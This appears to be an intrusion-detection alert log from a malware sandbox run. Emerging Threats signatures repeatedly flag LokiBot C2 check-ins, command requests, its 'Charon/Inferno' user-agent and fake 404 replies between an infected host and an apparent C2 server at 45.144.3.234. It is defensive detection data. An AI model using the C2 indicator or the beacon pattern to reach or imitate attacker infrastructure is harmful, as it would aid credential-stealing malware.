                                            12/02/20-11:54:08.508028TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.2.645.144.3.234
                                            12/02/20-11:54:08.637878TCP2025483ET TROJAN LokiBot Fake 404 Response804993645.144.3.234192.168.2.6
                                            12/02/20-11:54:09.113025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.2.645.144.3.234
                                            12/02/20-11:54:09.113025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.2.645.144.3.234
                                            12/02/20-11:54:09.113025TCP2025381ET TROJAN LokiBot Checkin4993780192.168.2.645.144.3.234
                                            12/02/20-11:54:09.113025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.2.645.144.3.234
                                            12/02/20-11:54:09.240146TCP2025483ET TROJAN LokiBot Fake 404 Response804993745.144.3.234192.168.2.6
                                            12/02/20-11:54:11.242526TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.2.645.144.3.234
                                            12/02/20-11:54:11.242526TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.2.645.144.3.234
                                            12/02/20-11:54:11.242526TCP2025381ET TROJAN LokiBot Checkin4993880192.168.2.645.144.3.234
                                            12/02/20-11:54:11.242526TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.2.645.144.3.234
                                            12/02/20-11:54:11.376330TCP2025483ET TROJAN LokiBot Fake 404 Response804993845.144.3.234192.168.2.6
                                            12/02/20-11:54:11.639263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.2.645.144.3.234
                                            12/02/20-11:54:11.639263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.2.645.144.3.234
                                            12/02/20-11:54:11.639263TCP2025381ET TROJAN LokiBot Checkin4993980192.168.2.645.144.3.234
                                            12/02/20-11:54:11.639263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.2.645.144.3.234
                                            12/02/20-11:54:11.771996TCP2025483ET TROJAN LokiBot Fake 404 Response804993945.144.3.234192.168.2.6
                                            12/02/20-11:54:12.071896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994080192.168.2.645.144.3.234
                                            12/02/20-11:54:12.071896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994080192.168.2.645.144.3.234
                                            12/02/20-11:54:12.071896TCP2025381ET TROJAN LokiBot Checkin4994080192.168.2.645.144.3.234
                                            12/02/20-11:54:12.071896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994080192.168.2.645.144.3.234
                                            12/02/20-11:54:12.200445TCP2025483ET TROJAN LokiBot Fake 404 Response804994045.144.3.234192.168.2.6
                                            12/02/20-11:54:12.634165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994180192.168.2.645.144.3.234
                                            12/02/20-11:54:12.634165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.2.645.144.3.234
                                            12/02/20-11:54:12.634165TCP2025381ET TROJAN LokiBot Checkin4994180192.168.2.645.144.3.234
                                            12/02/20-11:54:12.634165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994180192.168.2.645.144.3.234
                                            12/02/20-11:54:12.768112TCP2025483ET TROJAN LokiBot Fake 404 Response804994145.144.3.234192.168.2.6
                                            12/02/20-11:54:13.017353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994280192.168.2.645.144.3.234
                                            12/02/20-11:54:13.017353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.2.645.144.3.234
                                            12/02/20-11:54:13.017353TCP2025381ET TROJAN LokiBot Checkin4994280192.168.2.645.144.3.234
                                            12/02/20-11:54:13.017353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994280192.168.2.645.144.3.234
                                            12/02/20-11:54:13.140945TCP2025483ET TROJAN LokiBot Fake 404 Response804994245.144.3.234192.168.2.6
                                            12/02/20-11:54:13.460320TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994380192.168.2.645.144.3.234
                                            12/02/20-11:54:13.460320TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994380192.168.2.645.144.3.234
                                            12/02/20-11:54:13.460320TCP2025381ET TROJAN LokiBot Checkin4994380192.168.2.645.144.3.234
                                            12/02/20-11:54:13.460320TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994380192.168.2.645.144.3.234
                                            12/02/20-11:54:13.589609TCP2025483ET TROJAN LokiBot Fake 404 Response804994345.144.3.234192.168.2.6
                                            12/02/20-11:54:13.903884TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.2.645.144.3.234
                                            12/02/20-11:54:13.903884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994480192.168.2.645.144.3.234
                                            12/02/20-11:54:13.903884TCP2025381ET TROJAN LokiBot Checkin4994480192.168.2.645.144.3.234
                                            12/02/20-11:54:13.903884TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.2.645.144.3.234
                                            12/02/20-11:54:14.030296TCP2025483ET TROJAN LokiBot Fake 404 Response804994445.144.3.234192.168.2.6
                                            12/02/20-11:54:14.273896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994580192.168.2.645.144.3.234
                                            12/02/20-11:54:14.273896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994580192.168.2.645.144.3.234
                                            12/02/20-11:54:14.273896TCP2025381ET TROJAN LokiBot Checkin4994580192.168.2.645.144.3.234
                                            12/02/20-11:54:14.273896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994580192.168.2.645.144.3.234
                                            12/02/20-11:54:14.412825TCP2025483ET TROJAN LokiBot Fake 404 Response804994545.144.3.234192.168.2.6
                                            12/02/20-11:54:14.721468TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994680192.168.2.645.144.3.234
                                            12/02/20-11:54:14.721468TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994680192.168.2.645.144.3.234
                                            12/02/20-11:54:14.721468TCP2025381ET TROJAN LokiBot Checkin4994680192.168.2.645.144.3.234
                                            12/02/20-11:54:14.721468TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994680192.168.2.645.144.3.234
                                            12/02/20-11:54:14.852650TCP2025483ET TROJAN LokiBot Fake 404 Response804994645.144.3.234192.168.2.6
                                            12/02/20-11:54:15.132387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994780192.168.2.645.144.3.234
                                            12/02/20-11:54:15.132387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994780192.168.2.645.144.3.234
                                            12/02/20-11:54:15.132387TCP2025381ET TROJAN LokiBot Checkin4994780192.168.2.645.144.3.234
                                            12/02/20-11:54:15.132387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994780192.168.2.645.144.3.234
                                            12/02/20-11:54:15.261505TCP2025483ET TROJAN LokiBot Fake 404 Response804994745.144.3.234192.168.2.6
                                            12/02/20-11:54:15.547116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994880192.168.2.645.144.3.234
                                            12/02/20-11:54:15.547116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994880192.168.2.645.144.3.234
                                            12/02/20-11:54:15.547116TCP2025381ET TROJAN LokiBot Checkin4994880192.168.2.645.144.3.234
                                            12/02/20-11:54:15.547116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994880192.168.2.645.144.3.234
                                            12/02/20-11:54:15.675228TCP2025483ET TROJAN LokiBot Fake 404 Response804994845.144.3.234192.168.2.6
                                            12/02/20-11:54:15.920391TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994980192.168.2.645.144.3.234
                                            12/02/20-11:54:15.920391TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994980192.168.2.645.144.3.234
                                            12/02/20-11:54:15.920391TCP2025381ET TROJAN LokiBot Checkin4994980192.168.2.645.144.3.234
                                            12/02/20-11:54:15.920391TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994980192.168.2.645.144.3.234
                                            12/02/20-11:54:16.055699TCP2025483ET TROJAN LokiBot Fake 404 Response804994945.144.3.234192.168.2.6
                                            12/02/20-11:54:16.357728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995080192.168.2.645.144.3.234
                                            12/02/20-11:54:16.357728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995080192.168.2.645.144.3.234
                                            12/02/20-11:54:16.357728TCP2025381ET TROJAN LokiBot Checkin4995080192.168.2.645.144.3.234
                                            12/02/20-11:54:16.357728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995080192.168.2.645.144.3.234
                                            12/02/20-11:54:16.485111TCP2025483ET TROJAN LokiBot Fake 404 Response804995045.144.3.234192.168.2.6
                                            12/02/20-11:54:16.721967TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995380192.168.2.645.144.3.234
                                            12/02/20-11:54:16.721967TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995380192.168.2.645.144.3.234
                                            12/02/20-11:54:16.721967TCP2025381ET TROJAN LokiBot Checkin4995380192.168.2.645.144.3.234
                                            12/02/20-11:54:16.721967TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995380192.168.2.645.144.3.234
                                            12/02/20-11:54:16.854005TCP2025483ET TROJAN LokiBot Fake 404 Response804995345.144.3.234192.168.2.6
                                            12/02/20-11:54:17.155237TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995480192.168.2.645.144.3.234
                                            12/02/20-11:54:17.155237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995480192.168.2.645.144.3.234
                                            12/02/20-11:54:17.155237TCP2025381ET TROJAN LokiBot Checkin4995480192.168.2.645.144.3.234
                                            12/02/20-11:54:17.155237TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995480192.168.2.645.144.3.234
                                            12/02/20-11:54:17.282335TCP2025483ET TROJAN LokiBot Fake 404 Response804995445.144.3.234192.168.2.6
                                            12/02/20-11:54:17.509661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995580192.168.2.645.144.3.234
                                            12/02/20-11:54:17.509661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995580192.168.2.645.144.3.234
                                            12/02/20-11:54:17.509661TCP2025381ET TROJAN LokiBot Checkin4995580192.168.2.645.144.3.234
                                            12/02/20-11:54:17.509661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995580192.168.2.645.144.3.234
                                            12/02/20-11:54:17.634666TCP2025483ET TROJAN LokiBot Fake 404 Response804995545.144.3.234192.168.2.6
                                            12/02/20-11:54:17.931638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.2.645.144.3.234
                                            12/02/20-11:54:17.931638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995680192.168.2.645.144.3.234
                                            12/02/20-11:54:17.931638TCP2025381ET TROJAN LokiBot Checkin4995680192.168.2.645.144.3.234
                                            12/02/20-11:54:17.931638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.2.645.144.3.234
                                            12/02/20-11:54:18.084549TCP2025483ET TROJAN LokiBot Fake 404 Response804995645.144.3.234192.168.2.6
                                            12/02/20-11:54:18.320180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.2.645.144.3.234
                                            12/02/20-11:54:18.320180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995780192.168.2.645.144.3.234
                                            12/02/20-11:54:18.320180TCP2025381ET TROJAN LokiBot Checkin4995780192.168.2.645.144.3.234
                                            12/02/20-11:54:18.320180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995780192.168.2.645.144.3.234
                                            12/02/20-11:54:18.450666TCP2025483ET TROJAN LokiBot Fake 404 Response804995745.144.3.234192.168.2.6
                                            12/02/20-11:54:18.788389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995880192.168.2.645.144.3.234
                                            12/02/20-11:54:18.788389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995880192.168.2.645.144.3.234
                                            12/02/20-11:54:18.788389TCP2025381ET TROJAN LokiBot Checkin4995880192.168.2.645.144.3.234
                                            12/02/20-11:54:18.788389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995880192.168.2.645.144.3.234
                                            12/02/20-11:54:18.917301TCP2025483ET TROJAN LokiBot Fake 404 Response804995845.144.3.234192.168.2.6
                                            12/02/20-11:54:19.241028TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995980192.168.2.645.144.3.234
                                            12/02/20-11:54:19.241028TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4995980192.168.2.645.144.3.234
                                            12/02/20-11:54:19.241028TCP2025381ET TROJAN LokiBot Checkin4995980192.168.2.645.144.3.234
                                            12/02/20-11:54:19.241028TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995980192.168.2.645.144.3.234
                                            12/02/20-11:54:19.373669TCP2025483ET TROJAN LokiBot Fake 404 Response804995945.144.3.234192.168.2.6
                                            12/02/20-11:54:19.628893TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996080192.168.2.645.144.3.234
                                            12/02/20-11:54:19.628893TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996080192.168.2.645.144.3.234
                                            12/02/20-11:54:19.628893TCP2025381ET TROJAN LokiBot Checkin4996080192.168.2.645.144.3.234
                                            12/02/20-11:54:19.628893TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996080192.168.2.645.144.3.234
                                            12/02/20-11:54:19.758888TCP2025483ET TROJAN LokiBot Fake 404 Response804996045.144.3.234192.168.2.6
                                            12/02/20-11:54:20.012145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.2.645.144.3.234
                                            12/02/20-11:54:20.012145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996180192.168.2.645.144.3.234
                                            12/02/20-11:54:20.012145TCP2025381ET TROJAN LokiBot Checkin4996180192.168.2.645.144.3.234
                                            12/02/20-11:54:20.012145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.2.645.144.3.234
                                            12/02/20-11:54:20.137866TCP2025483ET TROJAN LokiBot Fake 404 Response804996145.144.3.234192.168.2.6
                                            12/02/20-11:54:20.474218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996280192.168.2.645.144.3.234
                                            12/02/20-11:54:20.474218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.2.645.144.3.234
                                            12/02/20-11:54:20.474218TCP2025381ET TROJAN LokiBot Checkin4996280192.168.2.645.144.3.234
                                            12/02/20-11:54:20.474218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996280192.168.2.645.144.3.234
                                            12/02/20-11:54:20.612632TCP2025483ET TROJAN LokiBot Fake 404 Response804996245.144.3.234192.168.2.6
                                            12/02/20-11:54:20.865487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996380192.168.2.645.144.3.234
                                            12/02/20-11:54:20.865487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996380192.168.2.645.144.3.234
                                            12/02/20-11:54:20.865487TCP2025381ET TROJAN LokiBot Checkin4996380192.168.2.645.144.3.234
                                            12/02/20-11:54:20.865487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996380192.168.2.645.144.3.234
                                            12/02/20-11:54:20.993083TCP2025483ET TROJAN LokiBot Fake 404 Response804996345.144.3.234192.168.2.6
                                            12/02/20-11:54:21.251330TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.2.645.144.3.234
                                            12/02/20-11:54:21.251330TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.2.645.144.3.234
                                            12/02/20-11:54:21.251330TCP2025381ET TROJAN LokiBot Checkin4996480192.168.2.645.144.3.234
                                            12/02/20-11:54:21.251330TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.2.645.144.3.234
                                            12/02/20-11:54:21.376931TCP2025483ET TROJAN LokiBot Fake 404 Response804996445.144.3.234192.168.2.6
                                            12/02/20-11:54:21.612720TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996580192.168.2.645.144.3.234
                                            12/02/20-11:54:21.612720TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996580192.168.2.645.144.3.234
                                            12/02/20-11:54:21.612720TCP2025381ET TROJAN LokiBot Checkin4996580192.168.2.645.144.3.234
                                            12/02/20-11:54:21.612720TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996580192.168.2.645.144.3.234
                                            12/02/20-11:54:21.738057TCP2025483ET TROJAN LokiBot Fake 404 Response804996545.144.3.234192.168.2.6
                                            12/02/20-11:54:21.993889TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.2.645.144.3.234
                                            12/02/20-11:54:21.993889TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.2.645.144.3.234
                                            12/02/20-11:54:21.993889TCP2025381ET TROJAN LokiBot Checkin4996680192.168.2.645.144.3.234
                                            12/02/20-11:54:21.993889TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.2.645.144.3.234
                                            12/02/20-11:54:22.123761TCP2025483ET TROJAN LokiBot Fake 404 Response804996645.144.3.234192.168.2.6
                                            12/02/20-11:54:22.405113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996780192.168.2.645.144.3.234
                                            12/02/20-11:54:22.405113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.2.645.144.3.234
                                            12/02/20-11:54:22.405113TCP2025381ET TROJAN LokiBot Checkin4996780192.168.2.645.144.3.234
                                            12/02/20-11:54:22.405113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996780192.168.2.645.144.3.234
                                            12/02/20-11:54:22.542134TCP2025483ET TROJAN LokiBot Fake 404 Response804996745.144.3.234192.168.2.6
                                            12/02/20-11:54:22.819145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996880192.168.2.645.144.3.234
                                            12/02/20-11:54:22.819145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996880192.168.2.645.144.3.234
                                            12/02/20-11:54:22.819145TCP2025381ET TROJAN LokiBot Checkin4996880192.168.2.645.144.3.234
                                            12/02/20-11:54:22.819145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996880192.168.2.645.144.3.234
                                            12/02/20-11:54:22.944392TCP2025483ET TROJAN LokiBot Fake 404 Response804996845.144.3.234192.168.2.6
                                            12/02/20-11:54:23.191460TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.2.645.144.3.234
                                            12/02/20-11:54:23.191460TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996980192.168.2.645.144.3.234
                                            12/02/20-11:54:23.191460TCP2025381ET TROJAN LokiBot Checkin4996980192.168.2.645.144.3.234
                                            12/02/20-11:54:23.191460TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.2.645.144.3.234
                                            12/02/20-11:54:23.319732TCP2025483ET TROJAN LokiBot Fake 404 Response804996945.144.3.234192.168.2.6
                                            12/02/20-11:54:23.600042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997080192.168.2.645.144.3.234
                                            12/02/20-11:54:23.600042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997080192.168.2.645.144.3.234
                                            12/02/20-11:54:23.600042TCP2025381ET TROJAN LokiBot Checkin4997080192.168.2.645.144.3.234
                                            12/02/20-11:54:23.600042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997080192.168.2.645.144.3.234
                                            12/02/20-11:54:23.739671TCP2025483ET TROJAN LokiBot Fake 404 Response804997045.144.3.234192.168.2.6
                                            12/02/20-11:54:24.003743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997180192.168.2.645.144.3.234
                                            12/02/20-11:54:24.003743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997180192.168.2.645.144.3.234
                                            12/02/20-11:54:24.003743TCP2025381ET TROJAN LokiBot Checkin4997180192.168.2.645.144.3.234
                                            12/02/20-11:54:24.003743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.2.645.144.3.234
                                            12/02/20-11:54:24.134993TCP2025483ET TROJAN LokiBot Fake 404 Response804997145.144.3.234192.168.2.6
                                            12/02/20-11:54:24.413582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.2.645.144.3.234
                                            12/02/20-11:54:24.413582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.2.645.144.3.234
                                            12/02/20-11:54:24.413582TCP2025381ET TROJAN LokiBot Checkin4997280192.168.2.645.144.3.234
                                            12/02/20-11:54:24.413582TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.2.645.144.3.234
                                            12/02/20-11:54:24.556477TCP2025483ET TROJAN LokiBot Fake 404 Response804997245.144.3.234192.168.2.6
                                            12/02/20-11:54:24.870784TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.2.645.144.3.234
                                            12/02/20-11:54:24.870784TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.2.645.144.3.234
                                            12/02/20-11:54:24.870784TCP2025381ET TROJAN LokiBot Checkin4997380192.168.2.645.144.3.234
                                            12/02/20-11:54:24.870784TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.2.645.144.3.234
                                            12/02/20-11:54:25.002434TCP2025483ET TROJAN LokiBot Fake 404 Response804997345.144.3.234192.168.2.6
                                            12/02/20-11:54:25.288195TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.2.645.144.3.234
                                            12/02/20-11:54:25.288195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.2.645.144.3.234
                                            12/02/20-11:54:25.288195TCP2025381ET TROJAN LokiBot Checkin4997480192.168.2.645.144.3.234
                                            12/02/20-11:54:25.288195TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.2.645.144.3.234
                                            12/02/20-11:54:25.414858TCP2025483ET TROJAN LokiBot Fake 404 Response804997445.144.3.234192.168.2.6
                                            12/02/20-11:54:25.721544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.2.645.144.3.234
                                            12/02/20-11:54:25.721544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.2.645.144.3.234
                                            12/02/20-11:54:25.721544TCP2025381ET TROJAN LokiBot Checkin4997580192.168.2.645.144.3.234
                                            12/02/20-11:54:25.721544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.2.645.144.3.234
                                            12/02/20-11:54:25.849073TCP2025483ET TROJAN LokiBot Fake 404 Response804997545.144.3.234192.168.2.6
                                            12/02/20-11:54:26.144787TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.2.645.144.3.234
                                            12/02/20-11:54:26.144787TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.2.645.144.3.234
                                            12/02/20-11:54:26.144787TCP2025381ET TROJAN LokiBot Checkin4997680192.168.2.645.144.3.234
                                            12/02/20-11:54:26.144787TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.2.645.144.3.234
                                            12/02/20-11:54:26.272979TCP2025483ET TROJAN LokiBot Fake 404 Response804997645.144.3.234192.168.2.6
                                            12/02/20-11:54:26.570983TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.2.645.144.3.234
                                            12/02/20-11:54:26.570983TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.2.645.144.3.234
                                            12/02/20-11:54:26.570983TCP2025381ET TROJAN LokiBot Checkin4997780192.168.2.645.144.3.234
                                            12/02/20-11:54:26.570983TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.2.645.144.3.234
                                            12/02/20-11:54:26.711049TCP2025483ET TROJAN LokiBot Fake 404 Response804997745.144.3.234192.168.2.6
                                            12/02/20-11:54:27.002604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.2.645.144.3.234
                                            12/02/20-11:54:27.002604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.2.645.144.3.234
                                            12/02/20-11:54:27.002604TCP2025381ET TROJAN LokiBot Checkin4997880192.168.2.645.144.3.234
                                            12/02/20-11:54:27.002604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.2.645.144.3.234
                                            12/02/20-11:54:27.132331TCP2025483ET TROJAN LokiBot Fake 404 Response804997845.144.3.234192.168.2.6
                                            12/02/20-11:54:27.439600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.2.645.144.3.234
                                            12/02/20-11:54:27.439600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.2.645.144.3.234
                                            12/02/20-11:54:27.439600TCP2025381ET TROJAN LokiBot Checkin4997980192.168.2.645.144.3.234
                                            12/02/20-11:54:27.439600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.2.645.144.3.234
                                            12/02/20-11:54:27.568900TCP2025483ET TROJAN LokiBot Fake 404 Response804997945.144.3.234192.168.2.6
                                            12/02/20-11:54:27.844926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.2.645.144.3.234
                                            12/02/20-11:54:27.844926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.2.645.144.3.234
                                            12/02/20-11:54:27.844926TCP2025381ET TROJAN LokiBot Checkin4998080192.168.2.645.144.3.234
                                            12/02/20-11:54:27.844926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.2.645.144.3.234
                                            12/02/20-11:54:27.972228TCP2025483ET TROJAN LokiBot Fake 404 Response804998045.144.3.234192.168.2.6
                                            12/02/20-11:54:28.210753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.2.645.144.3.234
                                            12/02/20-11:54:28.210753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.2.645.144.3.234
                                            12/02/20-11:54:28.210753TCP2025381ET TROJAN LokiBot Checkin4998180192.168.2.645.144.3.234
                                            12/02/20-11:54:28.210753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.2.645.144.3.234
                                            12/02/20-11:54:28.339983TCP2025483ET TROJAN LokiBot Fake 404 Response804998145.144.3.234192.168.2.6
                                            12/02/20-11:54:28.648579TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.2.645.144.3.234
                                            12/02/20-11:54:28.648579TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.2.645.144.3.234
                                            12/02/20-11:54:28.648579TCP2025381ET TROJAN LokiBot Checkin4998280192.168.2.645.144.3.234
                                            12/02/20-11:54:28.648579TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.2.645.144.3.234
                                            12/02/20-11:54:28.783734TCP2025483ET TROJAN LokiBot Fake 404 Response804998245.144.3.234192.168.2.6
                                            12/02/20-11:54:29.097570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.2.645.144.3.234
                                            12/02/20-11:54:29.097570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.2.645.144.3.234
                                            12/02/20-11:54:29.097570TCP2025381ET TROJAN LokiBot Checkin4998380192.168.2.645.144.3.234
                                            12/02/20-11:54:29.097570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.2.645.144.3.234
                                            12/02/20-11:54:29.229926TCP2025483ET TROJAN LokiBot Fake 404 Response804998345.144.3.234192.168.2.6
                                            12/02/20-11:54:29.481369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.2.645.144.3.234
                                            12/02/20-11:54:29.481369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.2.645.144.3.234
                                            12/02/20-11:54:29.481369TCP2025381ET TROJAN LokiBot Checkin4998480192.168.2.645.144.3.234
                                            12/02/20-11:54:29.481369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.2.645.144.3.234
                                            12/02/20-11:54:29.611300TCP2025483ET TROJAN LokiBot Fake 404 Response804998445.144.3.234192.168.2.6
                                            12/02/20-11:54:29.882166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.2.645.144.3.234
                                            12/02/20-11:54:29.882166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.2.645.144.3.234
                                            12/02/20-11:54:29.882166TCP2025381ET TROJAN LokiBot Checkin4998580192.168.2.645.144.3.234
                                            12/02/20-11:54:29.882166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.2.645.144.3.234
                                            12/02/20-11:54:30.031088TCP2025483ET TROJAN LokiBot Fake 404 Response804998545.144.3.234192.168.2.6
                                            12/02/20-11:54:30.266581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.2.645.144.3.234
                                            12/02/20-11:54:30.266581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.2.645.144.3.234
